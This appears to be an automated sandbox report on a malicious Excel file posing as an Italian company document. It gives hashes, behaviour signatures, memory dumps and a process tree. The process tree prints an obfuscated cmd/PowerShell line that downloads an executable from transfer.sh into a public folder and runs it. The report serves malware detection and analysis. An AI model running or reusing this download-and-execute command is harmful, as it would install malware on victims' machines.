Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    18-09-2023 08:46

General

  • Target

    Documento_Orslgroup_S.R.L_09_2023.xls

  • Size

    100KB

  • MD5

    c678822324d3db11afb66ad4dc9a5bb8

  • SHA1

    db82a3d3de0b0d90cc302e903e18dd9d2fb684c4

  • SHA256

    d77795d4563d03c0ec79533ac468580fa94ae26a54b5e14e34c3d6bdf9ae51b0

  • SHA512

    7a753d605ee1e5e14d3dbf0a67feb80c8fee21c0bdc7cba36298eead743b541e65d5d4d3f25124ec8d4ad54c38744f244bb721f7c0edb76d1a3441c0d291d03e

  • SSDEEP

    3072:BrxEtjPOtioVjDGUU1qfDlaGGx+cL2QnA9tJE2zuxq+fr9wBLa71ba2ryLTHeYD:pxEtjPOtioVjDGUU1qfDlavx+W2QnAnF

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Documento_Orslgroup_S.R.L_09_2023.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/SkazYLa2BT/happy.e^xe -o C:\Users\Public\pxpr0.exe;C:\Users\Public\pxpr0.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/SkazYLa2BT/happy.exe -o C:\Users\Public\pxpr0.exe;C:\Users\Public\pxpr0.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2768

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1916-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1916-1-0x000000007235D000-0x0000000072368000-memory.dmp
    Filesize

    44KB

  • memory/1916-4-0x0000000005F00000-0x0000000006000000-memory.dmp
    Filesize

    1024KB

  • memory/1916-12-0x000000007235D000-0x0000000072368000-memory.dmp
    Filesize

    44KB

  • memory/1916-13-0x0000000005F00000-0x0000000006000000-memory.dmp
    Filesize

    1024KB

  • memory/1916-14-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1916-15-0x000000007235D000-0x0000000072368000-memory.dmp
    Filesize

    44KB

  • memory/2768-9-0x00000000025F0000-0x0000000002630000-memory.dmp
    Filesize

    256KB

  • memory/2768-8-0x000000006BEC0000-0x000000006C46B000-memory.dmp
    Filesize

    5.7MB

  • memory/2768-7-0x000000006BEC0000-0x000000006C46B000-memory.dmp
    Filesize

    5.7MB

  • memory/2768-10-0x00000000025F0000-0x0000000002630000-memory.dmp
    Filesize

    256KB

  • memory/2768-11-0x000000006BEC0000-0x000000006C46B000-memory.dmp
    Filesize

    5.7MB